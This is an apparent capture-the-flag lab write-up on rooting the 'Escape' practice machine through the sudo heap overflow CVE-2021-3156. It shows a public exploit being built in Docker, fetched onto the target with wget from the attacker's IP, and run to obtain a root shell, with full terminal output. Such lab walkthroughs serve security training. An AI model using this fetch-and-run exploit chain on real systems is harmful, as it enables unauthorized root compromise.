InfoSec LAB

Escape_OffSec_Privilege_Escalation_3

Created: 3 min read

CVE-2021-3156

PEAS has identified that the target system is vulnerable to CVE-2021-3156

a vulnerability was found in sudo up to 1.8.31p2/1.9.5p1 (Operating System Utility Software). It has been rated as critical. This issue affects the function sudoers_policy_main. The manipulation with an unknown input leads to a heap-based overflow vulnerability. Using CWE to declare the problem leads to CWE-122. A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc(). Impacted is confidentiality, integrity, and availability.

Exploit

Exploit found online

Debian-snmp@escape:/var/tmp$ gcc
gcc
 
Command 'gcc' not found, but can be installed with:
 
apt install gcc
Please ask your administrator.
 
Debian-snmp@escape:/var/tmp$ cc
cc
 
Command 'cc' not found, but can be installed with:
 
apt install gcc            
apt install clang          
apt install pentium-builder
apt install tcc            
 
Ask your administrator to install one of them.

No local compiler available. Opting out to remote compilation

Docker Exploit Development

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/escape_offsec]
└─$ docker run -it --entrypoint "/bin/bash" -v ./:/root/host --name escape_offsec ubuntu:18.04  
root@1ed01be491bc:/# cd root; apt update -y; apt install git make nano gcc gcc-multilib -y

Setting up the environment

root@1ed01be491bc:~# git clone https://github.com/blasty/CVE-2021-3156; cd CVE-2021-3156; make; cd ..; tar -czf CVE-2021-3156.tar.gz CVE-2021-3156; cp CVE-2021-3156.tar.gz ./host/
Cloning into 'CVE-2021-3156'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (50/50), done.
remote: Compressing objects: 100% (35/35), done.
remote: Total 50 (delta 25), reused 38 (delta 15), pack-reused 0 (from 0)
Unpacking objects: 100% (50/50), done.
rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c

Downloading, compiling & packaging the exploit

Exploitation

Debian-snmp@escape:/var/tmp$ wget -q http://192.168.45.153/CVE-2021-3156.tar.gz; tar -xf CVE-2021-3156.tar.gz; cd CVE-2021-3156

Delivery complete

Debian-snmp@escape:/var/tmp/CVE-2021-3156$ ./sudo-hax-me-a-sandwich 0
./sudo-hax-me-a-sandwich 0
 
** CVE-2021-3156 PoC by blasty <peter@haxx.in>
 
using target: Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
# whoami
whoami
root
# hostname
hostname
escape
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:7e:d3:9c:0e brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:7eff:fed3:9c0e/64 scope link 
       valid_lft forever preferred_lft forever
5: vethe544e37@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 92:34:d7:75:cf:89 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::9034:d7ff:fe75:cf89/64 scope link 
       valid_lft forever preferred_lft forever
6: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:9e:76:59 brd ff:ff:ff:ff:ff:ff
    inet 192.168.122.113/24 brd 192.168.122.255 scope global ens192
       valid_lft forever preferred_lft forever

System level compromise

Interactive Graph View

Backlinks

  • No backlinks found